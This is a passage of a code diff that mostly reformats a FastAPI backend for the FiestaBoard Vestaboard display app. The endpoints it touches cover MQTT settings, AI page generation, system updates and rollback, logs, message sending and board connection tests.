         app.mount("/mcp", _mcp_server_instance.streamable_http_app())
         logger.info("FiestaBoard MCP server mounted at /mcp (public: /api/mcp)")
@@ -864,14 +863,12 @@ app.include_router(auth_router)
 if is_auth_enabled():
     logger.info("Authentication is ENABLED (FIESTABOARD_AUTH_ENABLED=true)")
 else:
-    logger.info(
-        "Authentication is disabled (set FIESTABOARD_AUTH_ENABLED=true to require login)"
-    )
+    logger.info("Authentication is disabled (set FIESTABOARD_AUTH_ENABLED=true to require login)")
 
 
 # Set up log buffer handler
 log_buffer_handler = LogBufferHandler()
-log_buffer_handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
+log_buffer_handler.setFormatter(logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s"))
 logging.getLogger().addHandler(log_buffer_handler)
 
 
@@ -884,7 +881,9 @@ def get_service() -> DisplayService | None:
                 try:
                     _service = DisplayService()
                     if not _service.initialize():
-                        logger.warning("Service initialization failed - service can be started later when configuration is fixed")
+                        logger.warning(
+                            "Service initialization failed - service can be started later when configuration is fixed"
+                        )
                         # Keep the service instance but mark it as uninitialized
                         # This allows the /start endpoint to retry initialization
                         return _service
@@ -969,22 +968,14 @@ def stop_display_service_sync() -> bool:
 @app.get("/", response_model=dict[str, str])
 async def root():
     """Root endpoint with API information."""
-    return {
-        "name": "FiestaBoard Display API",
-        "version": "1.0.0",
-        "status": "running"
-    }
+    return {"name": "FiestaBoard Display API", "version": "1.0.0", "status": "running"}
 
 
 @app.api_route("/health", methods=["GET", "HEAD"], response_model=HealthResponse)
 async def health():
     """Health check endpoint."""
     service = get_service()
-    return HealthResponse(
-        status="ok",
-        service_running=_service_running and service is not None,
-        version=__version__
-    )
+    return HealthResponse(status="ok", service_running=_service_running and service is not None, version=__version__)
 
 
 @app.get("/mqtt/status")
@@ -997,6 +988,7 @@ async def get_mqtt_status():
     """
     try:
         from .mqtt import get_mqtt_client
+
         client = get_mqtt_client()
         if client is None:
             return {"enabled": False, "connected": False, "running": False}
@@ -1019,6 +1011,7 @@ async def mqtt_republish_discovery():
     """
     try:
         from .mqtt import get_mqtt_client
+
         client = get_mqtt_client()
         if client is None or not client.is_connected():
             raise HTTPException(status_code=503, detail="MQTT client not connected")
@@ -1048,6 +1041,7 @@ def _apply_mqtt_config(mqtt_cfg) -> None:
         return
 
     from .mqtt.config import MQTTConfig
+
     config = MQTTConfig(
         enabled=mqtt_cfg.enabled,
         broker_host=mqtt_cfg.broker_host,
@@ -1083,6 +1077,7 @@ def _apply_mqtt_config(mqtt_cfg) -> None:
 async def get_mqtt_settings():
     """Return current MQTT integration settings (password masked)."""
     from .settings.service import get_settings_service
+
     s = get_settings_service().get_mqtt_settings()
     return s.to_dict(mask_secrets=True)
 
@@ -1097,6 +1092,7 @@ async def update_mqtt_settings(request: Request):
     """
     body = await request.json()
     from .settings.service import get_settings_service
+
     svc = get_settings_service()
     updated = svc.set_mqtt_settings(body)
     _apply_mqtt_config(updated)
@@ -1129,10 +1125,7 @@ def _ai_generate_throttle_check() -> None:
         if wait > 0:
             raise HTTPException(
                 status_code=429,
-                detail=(
-                    "AI generation is rate-limited. Please wait a moment "
-                    "and try again."
-                ),
+                detail=("AI generation is rate-limited. Please wait a moment and try again."),
             )
         _ai_generate_last_call = now
 
@@ -1211,14 +1204,11 @@ async def test_ai_provider(request: Request):
                 )
         else:
             default_id = block.get("default_provider_id")
-            provider = (
-                cm.get_ai_provider(default_id) if default_id else None
-            ) or block["providers"][0]
+            provider = (cm.get_ai_provider(default_id) if default_id else None) or block["providers"][0]
 
     from .ai.generator import test_provider as ai_test_provider
 
-    result = await ai_test_provider(provider, model=model)
-    return result
+    return await ai_test_provider(provider, model=model)
 
 
 @app.get("/pages/ai/context")
@@ -1275,13 +1265,9 @@ async def generate_ai_page(request: Request):
     if not isinstance(prompt, str) or not prompt.strip():
         raise HTTPException(status_code=400, detail="`prompt` is required.")
     if device_type not in ("flagship", "note"):
-        raise HTTPException(
-            status_code=400, detail=f"Invalid device_type: {device_type!r}"
-        )
+        raise HTTPException(status_code=400, detail=f"Invalid device_type: {device_type!r}")
     if current_page is not None and not isinstance(current_page, dict):
-        raise HTTPException(
-            status_code=400, detail="`current_page` must be an object."
-        )
+        raise HTTPException(status_code=400, detail="`current_page` must be an object.")
 
     cm = get_config_manager()
     providers_block = cm.get_ai_providers()
@@ -1313,9 +1299,7 @@ async def generate_ai_page(request: Request):
         logger.exception("Unexpected error in /pages/ai/generate")
         raise HTTPException(
             status_code=500,
-            detail=(
-                "Unexpected AI generation error. See server logs for details."
-            ),
+            detail=("Unexpected AI generation error. See server logs for details."),
         ) from None
 
     return result
@@ -1377,37 +1361,21 @@ async def chat_ai_page(request: Request):
         )
 
     if not isinstance(messages, list) or not messages:
-        raise HTTPException(
-            status_code=400, detail="`messages` must be a non-empty array."
-        )
+        raise HTTPException(status_code=400, detail="`messages` must be a non-empty array.")
     if device_type not in ("flagship", "note"):
-        raise HTTPException(
-            status_code=400, detail=f"Invalid device_type: {device_type!r}"
-        )
+        raise HTTPException(status_code=400, detail=f"Invalid device_type: {device_type!r}")
     if current_page is not None and not isinstance(current_page, dict):
-        raise HTTPException(
-            status_code=400, detail="`current_page` must be an object."
-        )
+        raise HTTPException(status_code=400, detail="`current_page` must be an object.")
     if available_pages is not None and not isinstance(available_pages, list):
-        raise HTTPException(
-            status_code=400, detail="`available_pages` must be an array."
-        )
+        raise HTTPException(status_code=400, detail="`available_pages` must be an array.")
     if installed_plugins is not None and not isinstance(installed_plugins, list):
-        raise HTTPException(
-            status_code=400, detail="`installed_plugins` must be an array."
-        )
+        raise HTTPException(status_code=400, detail="`installed_plugins` must be an array.")
     if available_schedules is not None and not isinstance(available_schedules, list):
-        raise HTTPException(
-            status_code=400, detail="`available_schedules` must be an array."
-        )
+        raise HTTPException(status_code=400, detail="`available_schedules` must be an array.")
     if available_carousels is not None and not isinstance(available_carousels, list):
-        raise HTTPException(
-            status_code=400, detail="`available_carousels` must be an array."
-        )
+        raise HTTPException(status_code=400, detail="`available_carousels` must be an array.")
     if registry_plugins is not None and not isinstance(registry_plugins, list):
-        raise HTTPException(
-            status_code=400, detail="`registry_plugins` must be an array."
-        )
+        raise HTTPException(status_code=400, detail="`registry_plugins` must be an array.")
 
     cm = get_config_manager()
     providers_block = cm.get_ai_providers()
@@ -1426,9 +1394,7 @@ async def chat_ai_page(request: Request):
         try:
             await _AI_GENERATE_SEMAPHORE.acquire()
         except Exception:
-            yield _format_sse_event(
-                "error", {"message": "Could not acquire AI lock."}
-            )
+            yield _format_sse_event("error", {"message": "Could not acquire AI lock."})
             return
         try:
             try:
@@ -1453,12 +1419,7 @@ async def chat_ai_page(request: Request):
                 logger.exception("Unexpected error in /pages/ai/chat")
                 yield _format_sse_event(
                     "error",
-                    {
-                        "message": (
-                            "Unexpected AI chat error. See server logs for "
-                            "details."
-                        )
-                    },
+                    {"message": ("Unexpected AI chat error. See server logs for details.")},
                 )
         finally:
             _AI_GENERATE_SEMAPHORE.release()
@@ -1529,9 +1490,7 @@ def _collect_plugin_demos() -> list[dict[str, Any]]:
                     "name": getattr(demo, "name", plugin_id),
                     "device_type": getattr(demo, "device_type", "flagship"),
                     "template": list(getattr(demo, "template", []) or []),
-                    "line_metadata": list(
-                        getattr(demo, "line_metadata", []) or []
-                    ),
+                    "line_metadata": list(getattr(demo, "line_metadata", []) or []),
                     "duration_seconds": getattr(demo, "duration_seconds", 300),
                 }
             )
@@ -1549,7 +1508,7 @@ def _detect_hardware_model() -> str | None:
     UI suppresses the row when this returns None.
     """
     try:
-        with open("/proc/device-tree/model", "rb") as f:
+        with Path("/proc/device-tree/model").open("rb") as f:
             raw = f.read(256)
     except (FileNotFoundError, PermissionError, OSError):
         return None
@@ -1704,11 +1663,13 @@ def _is_newer_version(latest: str, current: str) -> bool:
     Handles version strings with varying component counts (e.g. "2.0" vs "2.0.1").
     """
     try:
+
         def parse_version(v: str):
             parts = v.split(".")
             if not parts or not all(p.isdigit() for p in parts):
                 raise ValueError(f"Invalid version: {v}")
             return tuple(int(x) for x in parts)
+
         return parse_version(latest) > parse_version(current)
     except (ValueError, AttributeError):
         return False
@@ -1927,9 +1888,7 @@ SETTINGS_SNAPSHOT_RETENTION = 5
 #: accept the exact ``pre-update-YYYYMMDDTHHMMSS[.fff]Z.json`` shape we
 #: produce (sub-second component optional for back-compat), so the restore
 #: endpoint cannot be coaxed into reading arbitrary files.
-_SETTINGS_SNAPSHOT_NAME_RE = re.compile(
-    r"^pre-update-\d{8}T\d{6}(?:\.\d{3})?Z\.json$"
-)
+_SETTINGS_SNAPSHOT_NAME_RE = re.compile(r"^pre-update-\d{8}T\d{6}(?:\.\d{3})?Z\.json$")
 
 
 def _take_settings_snapshot(
@@ -1956,6 +1915,7 @@ def _take_settings_snapshot(
     """
     try:
         from .backup.service import get_backup_service
+
         service = get_backup_service()
         document = service.export_to_json()
     except Exception:
@@ -2247,7 +2207,10 @@ async def system_update_apply():
     if resp.status_code == 401:
         raise HTTPException(
             status_code=500,
-            detail={"status": "error", "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services"},
+            detail={
+                "status": "error",
+                "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services",
+            },
         )
     if resp.status_code >= 400:
         raise HTTPException(
@@ -2353,9 +2316,7 @@ async def system_update_rollback(req: RollbackRequest):
         try:
             # Don't reinstall plugins from a settings-only snapshot: the user is
             # rolling back configuration, not reshaping their plugin set.
-            result = await asyncio.to_thread(
-                service.import_from_json, raw, reinstall_plugins=False
-            )
+            result = await asyncio.to_thread(service.import_from_json, raw, reinstall_plugins=False)
         except BackupError as e:
             raise HTTPException(
                 status_code=400,
@@ -2377,13 +2338,9 @@ async def system_update_rollback(req: RollbackRequest):
             # Old snapshot taken before we started annotating.  We can't
             # safely guess the digest, so report partial success rather
             # than guessing.
-            warnings.append(
-                "Snapshot does not record a previous image digest; image was not rolled back."
-            )
+            warnings.append("Snapshot does not record a previous image digest; image was not rolled back.")
         elif not _DIGEST_RE.fullmatch(digest) or not _IMAGE_REF_RE.fullmatch(image_ref):
-            warnings.append(
-                "Snapshot's recorded image identity is malformed; image was not rolled back."
-            )
+            warnings.append("Snapshot's recorded image identity is malformed; image was not rolled back.")
         elif not _updater_token():
             warnings.append(
                 "FIESTAUPDATER_TOKEN is not set; image rollback is unavailable. "
@@ -2422,7 +2379,10 @@ async def system_update_rollback(req: RollbackRequest):
             if resp.status_code >= 400:
                 raise HTTPException(
                     status_code=502,
-                    detail={"status": "error", "error": f"fiestaupdater returned {resp.status_code}: {resp.text[:200]}"},
+                    detail={
+                        "status": "error",
+                        "error": f"fiestaupdater returned {resp.status_code}: {resp.text[:200]}",
+                    },
                 )
 
             image_result = {
@@ -2458,10 +2418,7 @@ async def system_update_set_auto(req: AutoUpdateRequest):
         if req.interval not in AUTO_UPDATE_INTERVALS:
             raise HTTPException(
                 status_code=422,
-                detail=(
-                    f"Invalid interval {req.interval!r}; "
-                    f"must be one of: {sorted(AUTO_UPDATE_INTERVALS.keys())}"
-                ),
+                detail=(f"Invalid interval {req.interval!r}; must be one of: {sorted(AUTO_UPDATE_INTERVALS.keys())}"),
             )
         interval = req.interval
     elif req.enabled is not None:
@@ -2507,7 +2464,10 @@ def _handle_updater_response(resp: requests.Response, action: str) -> SystemActi
     if resp.status_code == 401:
         raise HTTPException(
             status_code=500,
-            detail={"status": "error", "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services"},
+            detail={
+                "status": "error",
+                "error": "fiestaupdater rejected our token; check FIESTAUPDATER_TOKEN matches in both services",
+            },
         )
     if resp.status_code >= 400:
         raise HTTPException(
@@ -2642,9 +2602,7 @@ async def wifi_connect(payload: WiFiConnectRequest):
     if not cap.available:
         raise _wifi_unavailable(cap.reason)
     try:
-        result = await svc.connect(
-            ssid=payload.ssid, password=payload.password, hidden=payload.hidden
-        )
+        result = await svc.connect(ssid=payload.ssid, password=payload.password, hidden=payload.hidden)
     except WiFiError as exc:
         raise _wifi_error(exc) from exc
     return WiFiConnectResponse(
@@ -2685,7 +2643,7 @@ async def get_logs(
     limit: int = Query(default=50, ge=1, le=500, description="Number of log entries to return"),
     offset: int = Query(default=0, ge=0, description="Offset for pagination"),
     level: str | None = Query(default=None, description="Filter by log level (DEBUG, INFO, WARNING, ERROR, CRITICAL)"),
-    search: str | None = Query(default=None, description="Search in log message or logger name")
+    search: str | None = Query(default=None, description="Search in log message or logger name"),
 ):
     """Get application logs with pagination, filtering, and search.
 
@@ -2701,17 +2659,9 @@ async def get_logs(
     # Validate level if provided
     valid_levels = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
     if level and level.upper() not in valid_levels:
-        raise HTTPException(
-            status_code=400,
-            detail=f"Invalid log level: {level}. Valid levels: {valid_levels}"
-        )
+        raise HTTPException(status_code=400, detail=f"Invalid log level: {level}. Valid levels: {valid_levels}")
 
-    logs, total, has_more = _read_logs_from_files(
-        limit=limit,
-        offset=offset,
-        level=level,
-        search=search
-    )
+    logs, total, has_more = _read_logs_from_files(limit=limit, offset=offset, level=level, search=search)
 
     return {
         "logs": logs,
@@ -2719,10 +2669,7 @@ async def get_logs(
         "limit": limit,
         "offset": offset,
         "has_more": has_more,
-        "filters": {
-            "level": level.upper() if level else None,
-            "search": search
-        }
+        "filters": {"level": level.upper() if level else None, "search": search},
     }
 
 
@@ -2736,9 +2683,7 @@ async def get_status():
     settings_service = get_settings_service()
 
     status = StatusResponse(
-        running=_service_running,
-        initialized=service is not None,
-        config_summary=Config.get_summary()
+        running=_service_running, initialized=service is not None, config_summary=Config.get_summary()
     )
     # Add active page ID to config summary
     status.config_summary["active_page_id"] = settings_service.get_active_page_id()
@@ -2766,7 +2711,7 @@ async def start_service(background_tasks: BackgroundTasks):
         if not service.initialize():
             raise HTTPException(
                 status_code=503,
-                detail="Service initialization failed - check board configuration (API key, host, etc.)"
+                detail="Service initialization failed - check board configuration (API key, host, etc.)",
             )
         logger.info("Service initialization successful on retry")
 
@@ -2779,8 +2724,7 @@ async def start_service(background_tasks: BackgroundTasks):
 
     if _service_running:
         return {"status": "started", "message": "Service started successfully"}
-    else:
-        raise HTTPException(status_code=500, detail="Service failed to start - check logs for details")
+    raise HTTPException(status_code=500, detail="Service failed to start - check logs for details")
 
 
 @app.post("/stop")
@@ -2811,7 +2755,7 @@ async def refresh_display():
         return {"status": "success", "message": "Display refreshed successfully"}
     except Exception as e:
         logger.error(f"Error refreshing display: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to refresh display: {str(e)}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to refresh display: {e!s}") from e
 
 
 def _characters_to_message(characters: list) -> str:
@@ -2829,22 +2773,69 @@ def _characters_to_message(characters: list) -> str:
     """
     # Index-aligned lookup table for codes 0–62
     _LOOKUP = [
-        ' ',  # 0
-        'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',  # 1–10
-        'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',  # 11–20
-        'U', 'V', 'W', 'X', 'Y', 'Z',                        # 21–26
-        '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',   # 27–36
-        '!', '@', '#', '$', '(', ')',                         # 37–42
-        ' ',                                                   # 43 – undefined
-        '-',                                                   # 44
-        ' ',                                                   # 45 – undefined
-        '+', '&', '=', ';', ':',                              # 46–50
-        ' ',                                                   # 51 – undefined
-        "'", '"', '%', ',', '.',                              # 52–56
-        ' ', ' ',                                              # 57–58 – undefined
-        '/', '?',                                              # 59–60
-        ' ',                                                   # 61 – undefined
-        '°',                                                   # 62
+        " ",  # 0
+        "A",
+        "B",
+        "C",
+        "D",
+        "E",
+        "F",
+        "G",
+        "H",
+        "I",
+        "J",  # 1–10
+        "K",
+        "L",
+        "M",
+        "N",
+        "O",
+        "P",
+        "Q",
+        "R",
+        "S",
+        "T",  # 11–20
+        "U",
+        "V",
+        "W",
+        "X",
+        "Y",
+        "Z",  # 21–26
+        "1",
+        "2",
+        "3",
+        "4",
+        "5",
+        "6",
+        "7",
+        "8",
+        "9",
+        "0",  # 27–36
+        "!",
+        "@",
+        "#",
+        "$",
+        "(",
+        ")",  # 37–42
+        " ",  # 43 – undefined
+        "-",  # 44
+        " ",  # 45 – undefined
+        "+",
+        "&",
+        "=",
+        ";",
+        ":",  # 46–50
+        " ",  # 51 – undefined
+        "'",
+        '"',
+        "%",
+        ",",
+        ".",  # 52–56
+        " ",
+        " ",  # 57–58 – undefined
+        "/",
+        "?",  # 59–60
+        " ",  # 61 – undefined
+        "°",  # 62
     ]
 
     lines = []
@@ -2852,13 +2843,13 @@ def _characters_to_message(characters: list) -> str:
         chars = []
         for code in row:
             if 63 <= code <= 71:
-                chars.append(f'{{{code}}}')
+                chars.append(f"{{{code}}}")
             elif 0 <= code < len(_LOOKUP):
                 chars.append(_LOOKUP[code])
             else:
-                chars.append(' ')
-        lines.append(''.join(chars))
-    return '\n'.join(lines)
+                chars.append(" ")
+        lines.append("".join(chars))
+    return "\n".join(lines)
 
 
 @app.get("/board/current-message")
@@ -2925,7 +2916,7 @@ async def send_message(request: MessageRequest):
         return {
             "status": "blocked",
             "message": "Manual sends blocked during silence mode to prevent wake-ups",
-            "silence_mode": True
+            "silence_mode": True,
         }
 
     if not service.vb_client:
@@ -2941,19 +2932,17 @@ async def send_message(request: MessageRequest):
             board_array,
             strategy=transition.strategy,
             step_interval_ms=transition.step_interval_ms,
-            step_size=transition.step_size
+            step_size=transition.step_size,
         )
         if success:
             if was_sent:
                 service.request_board_refresh()
                 return {"status": "success", "message": "Message sent successfully"}
-            else:
-                return {"status": "success", "message": "Message unchanged, no update needed", "skipped": True}
-        else:
-            raise HTTPException(status_code=500, detail="Failed to send message")
+            return {"status": "success", "message": "Message unchanged, no update needed", "skipped": True}
+        raise HTTPException(status_code=500, detail="Failed to send message")
     except Exception as e:
         logger.error(f"Error sending message: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to send message: {str(e)}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to send message: {e!s}") from e
 
 
 @app.get("/config")
@@ -3012,7 +3001,9 @@ def _build_welcome_template(device_type: str, custom_msg: str) -> list:
     if custom_msg and len(custom_msg) > cols:
         logger.debug(
             "Welcome message truncated from %d to %d characters for %s device",
-            len(custom_msg), cols, device_type,
+            len(custom_msg),
+            cols,
+            device_type,
         )
     return [row.replace("{center}", center_text) for row in rows]
 
@@ -3033,11 +3024,7 @@ async def send_welcome_message():
     # Check silence mode
     if Config.is_silence_mode_active():
         logger.info("Silence mode is active - blocking welcome message to prevent wake-up")
-        return {
-            "status": "blocked",
-            "message": "Welcome message blocked during silence mode",
-            "silence_mode": True
-        }
+        return {"status": "blocked", "message": "Welcome message blocked during silence mode", "silence_mode": True}
 
     # Create a fresh board client with current config values
     # This ensures any config changes from the setup wizard are used
@@ -3047,11 +3034,11 @@ async def send_welcome_message():
             api_key=Config.get_board_api_key(),
             host=Config.BOARD_HOST if not use_cloud else None,
             use_cloud=use_cloud,
-            skip_unchanged=False  # Always send the welcome message
+            skip_unchanged=False,  # Always send the welcome message
         )
     except ValueError as e:
         logger.error(f"Failed to create board client: {e}")
-        raise HTTPException(status_code=503, detail=f"Board not configured: {str(e)}") from e
+        raise HTTPException(status_code=503, detail=f"Board not configured: {e!s}") from e
 
     try:
         # Use custom welcome message if set, otherwise use the default
@@ -3092,26 +3079,25 @@ async def send_welcome_message():
             strategy=transition.strategy,
             step_interval_ms=transition.step_interval_ms,
             step_size=transition.step_size,
-            force=True  # Force send even if cached
+            force=True,  # Force send even if cached
         )
 
         if success:
             if was_sent:
                 logger.info("Welcome message sent to board")
                 return {"status": "success", "message": "Welcome message sent to your board!"}
-            else:
-                return {"status": "success", "message": "Welcome message unchanged", "skipped": True}
-        else:
-            raise HTTPException(status_code=500, detail="Failed to send welcome message")
+            return {"status": "success", "message": "Welcome message unchanged", "skipped": True}
+        raise HTTPException(status_code=500, detail="Failed to send welcome message")
 
     except Exception as e:
         logger.error(f"Error sending welcome message: {e}")
-        raise HTTPException(status_code=500, detail=f"Failed to send welcome message: {str(e)}") from e
+        raise HTTPException(status_code=500, detail=f"Failed to send welcome message: {e!s}") from e
 
 
 # =============================================================================
 # Configuration Management Endpoints
 # =============================================================================
+
 
 @app.get("/config/full")
 async def get_full_config():
@@ -3132,10 +3118,7 @@ async def get_board_config():
     board_config = config_manager.get_board()
     masked = config_manager._mask_sensitive(board_config)
 
-    return {
-        "config": masked,
-        "api_modes": ["local", "cloud"]
-    }
+    return {"config": masked, "api_modes": ["local", "cloud"]}
 
 
 # Deprecated backward compatibility endpoint - redirects to /config/board
@@ -3175,10 +3158,7 @@ async def update_board_config(request: dict):
     updated = config_manager.get_board()
     masked = config_manager._mask_sensitive(updated)
 
-    return {
-        "status": "success",
-        "config": masked
-    }
+    return {"status": "success", "config": masked}
 
 
 # Deprecated backward compatibility endpoint - redirects to /config/board
@@ -3212,17 +3192,22 @@ async def reset_board_config():
     # detects first-run mode regardless of which storage path is checked.
     try:
         from .devices import BoardInstance
+
         settings_svc = get_settings_service()
-        settings_svc.set_boards([BoardInstance(
-            name="My Board",
-            device_type="flagship",
-            board_color="black",
-            enabled=True,
-            api_mode="local",
-            host="",
-            local_api_key="",
-            cloud_key="",
-        ).to_dict()])
+        settings_svc.set_boards(
+            [
+                BoardInstance(
+                    name="My Board",
+                    device_type="flagship",
+                    board_color="black",
+                    enabled=True,
+                    api_mode="local",
+                    host="",
+                    local_api_key="",
+                    cloud_key="",
+                ).to_dict()
+            ]
+        )
     except Exception:  # pragma: no cover - defensive
         logger.exception("Failed to reset multi-board settings during board config reset")
 
@@ -3279,6 +3264,7 @@ async def validate_config():
     has_configured_board_instance = False
     try:
         from .devices import BoardInstance
+
         board_settings = get_settings_service().get_board_settings()
         for b in board_settings.boards or []:
             try:
@@ -3298,16 +3284,12 @@ async def validate_config():
         errors = [e for e in errors if not e.startswith(board_error_prefixes)]
         is_valid = len(errors) == 0
 
-    return {
-        "valid": is_valid,
-        "is_first_run": is_first_run,
-        "errors": errors,
-        "missing_fields": missing_fields
-    }
+    return {"valid": is_valid, "is_first_run": is_first_run, "errors": errors, "missing_fields": missing_fields}
 
 
 class BoardTestRequest(BaseModel):
     """Request model for testing board connection."""
+
     api_mode: str = "local"
     local_api_key: str | None = None
     cloud_key: str | None = None
@@ -3346,11 +3328,7 @@ async def test_board_connection(request: BoardTestRequest):
     # Validate required fields based on mode
     if api_mode == "cloud":
         if not request.cloud_key:
-            return {
-                "success": False,
-                "message": "Cloud API key is required",
-                "error": "Missing cloud_key parameter"
-            }
+            return {"success": False, "message": "Cloud API key is required", "error": "Missing cloud_key parameter"}
         api_key = request.cloud_key
         use_cloud = True
         host = None
@@ -3359,13 +3337,13 @@ async def test_board_connection(request: BoardTestRequest):
             return {
                 "success": False,
                 "message": "Local API key is required",
-                "error": "Missing local_api_key parameter"
+                "error": "Missing local_api_key parameter",
             }
         if not request.host:
             return {
                 "success": False,
                 "message": "Board host/IP is required for Local API",
-                "error": "Missing host parameter"
+                "error": "Missing host parameter",
             }
         api_key = request.local_api_key
         use_cloud = False
@@ -3381,18 +3359,11 @@ async def test_board_connection(request: BoardTestRequest):
 
     try:
         # Create temporary client with provided credentials
-        client = BoardClient(
-            api_key=api_key,
-            host=host,
-            use_cloud=use_cloud,
-            skip_unchanged=False
-        )
+        client = BoardClient(api_key=api_key, host=host, use_cloud=use_cloud, skip_unchanged=False)
 
         # Test the connection directly so we can inspect HTTP status codes
         # (read_current_message() swallows errors and returns None, losing details)
-        response = await asyncio.to_thread(
-            requests.get, client.base_url, headers=client.headers, timeout=10
-        )
+        response = await asyncio.to_thread(requests.get, client.base_url, headers=client.headers, timeout=10)
 
         if response.status_code == 200:
             # Parse the response to verify it's valid board data
@@ -3410,9 +3381,7 @@ async def test_board_connection(request: BoardTestRequest):
                     if isinstance(data, dict)
                     else f"body type: {type(data).__name__}"
                 )
-                logger.warning(
-                    f"Board connection test: HTTP 200 but unrecognized response ({api_mode} mode): {detail}"
-                )
+                logger.warning(f"Board connection test: HTTP 200 but unrecognized response ({api_mode} mode): {detail}")
                 return {
                     "success": False,
                     "message": "Connected to Vestaboard but the response shape was not recognized.",
@@ -3431,7 +3400,7 @@ async def test_board_connection(request: BoardTestRequest):
                     "troubleshooting": [
                         "Wait 30 seconds and try again — the board may still be starting up.",
                         "Try unplugging the board for 10 seconds and plugging it back in.",
-                    ]
+                    ],
                 }
 
         elif response.status_code == 401 or response.status_code == 403:
@@ -3445,20 +3414,19 @@ async def test_board_connection(request: BoardTestRequest):
                         "Go to https://web.vestaboard.com and sign in to your account.",
                         "Make sure you are copying the Read/Write API key (not the subscription key or installable key).",
                         "Paste the key into the Cloud API Key field and try again.",
-                    ]
+                    ],
                 }
-            else:
-                return {
-                    "success": False,
-                    "message": f"Your API key was rejected by the board (HTTP {response.status_code}).",
-                    "error": f"HTTP {response.status_code}",
-                    "troubleshooting": [
-                        "Verify your Local API key is correct — it was provided when you enabled the Local API with your enablement token.",
-                        "If you need a new key, request an enablement token at https://www.vestaboard.com/local-api",
-                        "Paste the correct key into the Local API Key field and try again.",
-                        "If the key was recently regenerated, the old key will no longer work.",
-                    ]
-                }
+            return {
+                "success": False,
+                "message": f"Your API key was rejected by the board (HTTP {response.status_code}).",
+                "error": f"HTTP {response.status_code}",
+                "troubleshooting": [
+                    "Verify your Local API key is correct — it was provided when you enabled the Local API with your enablement token.",
+                    "If you need a new key, request an enablement token at https://www.vestaboard.com/local-api",
+                    "Paste the correct key into the Local API Key field and try again.",
+                    "If the key was recently regenerated, the old key will no longer work.",
+                ],
+            }
 
         elif response.status_code >= 500:
             logger.warning(f"Board connection test: server error HTTP {response.status_code} ({api_mode} mode)")
@@ -3470,7 +3438,7 @@ async def test_board_connection(request: BoardTestRequest):
                     "Try unplugging the Vestaboard for 10 seconds and plugging it back in.",
                     "Wait about a minute for the board to restart, then try again.",
                     "If the problem continues, check for firmware updates in the Vestaboard app.",
-                ]
+                ],
             }
 
         else:
@@ -3483,7 +3451,7 @@ async def test_board_connection(request: BoardTestRequest):
                     "Try unplugging the Vestaboard for 10 seconds and plugging it back in.",
                     "Check for firmware updates in the Vestaboard app.",
                     "If the problem continues, try using the other connection mode (Local or Cloud).",
-                ]
+                ],
             }
 
     except ValueError:
@@ -3492,7 +3460,7 @@ async def test_board_connection(request: BoardTestRequest):
         return {
             "success": False,
             "message": "Board connection configuration is invalid.",
-            "error": "Configuration error"
+            "error": "Configuration error",
         }
     except requests.exceptions.ConnectionError as e:
         logger.error(f"Board connection test error: {e}")
@@ -3505,20 +3473,19 @@ async def test_board_connection(request: BoardTestRequest):
                     "Make sure the device running FiestaBoard has a working internet connection.",
                     "Try opening https://rw.vestaboard.com in a browser to verify the service is reachable.",
                     "If you use a VPN or corporate network, make sure it allows connections to rw.vestaboard.com.",
-                ]
+                ],
             }
-        else:
-            return {
-                "success": False,
-                "message": "Could not connect to the board. The board may be off or not on the same network.",
-                "error": "Connection error",
-                "troubleshooting": [
-                    "Make sure the Vestaboard is powered on (check for the LED on the back).",
-                    "Make sure both FiestaBoard and the Vestaboard are on the same Wi-Fi network.",
-                    "Double-check the board's IP address — you can find it on your router's admin page or use FiestaBoard's network scan.",
-                    "Make sure the Local API is enabled on your board (see https://docs.vestaboard.com/docs/local-api/authentication).",
-                ]
-            }
+        return {
+            "success": False,
+            "message": "Could not connect to the board. The board may be off or not on the same network.",
+            "error": "Connection error",
+            "troubleshooting": [
+                "Make sure the Vestaboard is powered on (check for the LED on the back).",
+                "Make sure both FiestaBoard and the Vestaboard are on the same Wi-Fi network.",
+                "Double-check the board's IP address — you can find it on your router's admin page or use FiestaBoard's network scan.",
+                "Make sure the Local API is enabled on your board (see https://docs.vestaboard.com/docs/local-api/authentication).",
+            ],
+        }
     except requests.exceptions.Timeout as e:
         logger.error(f"Board connection test timeout: {e}")
         if use_cloud:
@@ -3529,20 +3496,19 @@ async def test_board_connection(request: BoardTestRequest):
                 "troubleshooting": [
                     "Check that the device running FiestaBoard has a stable internet connection.",
                     "The Vestaboard cloud service may be experiencing issues — try again in a few minutes.",
-                ]
+                ],
             }
-        else:
-            return {
-                "success": False,
-                "message": "Connection to the board timed out. The board may be off or the IP address may be wrong.",
-                "error": "Timeout",
-                "troubleshooting": [
-                    "Make sure the Vestaboard is powered on.",
-                    "Double-check the IP address in the Vestaboard app under Settings.",
-                    "Make sure both devices are on the same network.",
-                    "Try using the board's IP address instead of a hostname.",
-                ]
-            }
+        return {
+            "success": False,
+            "message": "Connection to the board timed out. The board may be off or the IP address may be wrong.",
+            "error": "Timeout",
+            "troubleshooting": [
+                "Make sure the Vestaboard is powered on.",
+                "Double-check the IP address in the Vestaboard app under Settings.",
+                "Make sure both devices are on the same network.",
+                "Try using the board's IP address instead of a hostname.",
+            ],
+        }
     except Exception as e:
         logger.error(f"Board connection test error: {e}", exc_info=True)
         return {
@@ -3553,18 +3519,20 @@ async def test_board_connection(request: BoardTestRequest):
                 "Make sure the Vestaboard is powered on and connected to your network.",
                 "Try restarting FiestaBoard and the Vestaboard.",
                 "Visit the Network Diagnostics page for a detailed connection check.",
-            ]
+            ],
         }
 
 
 class EnablementTokenRequest(BaseModel):
     """Request model for exchanging enablement token for API key."""
+
     host: str
     enablement_token: str
 
 
 class BoardScanRequest(BaseModel):
     """Request model for network board scanning."""
+
     timeout: float | None = 4.0
 
 
@@ -3590,17 +3558,13 @@ async def enable_local_api(request: EnablementTokenRequest):
     import requests as http_requests
 
     if not request.host:
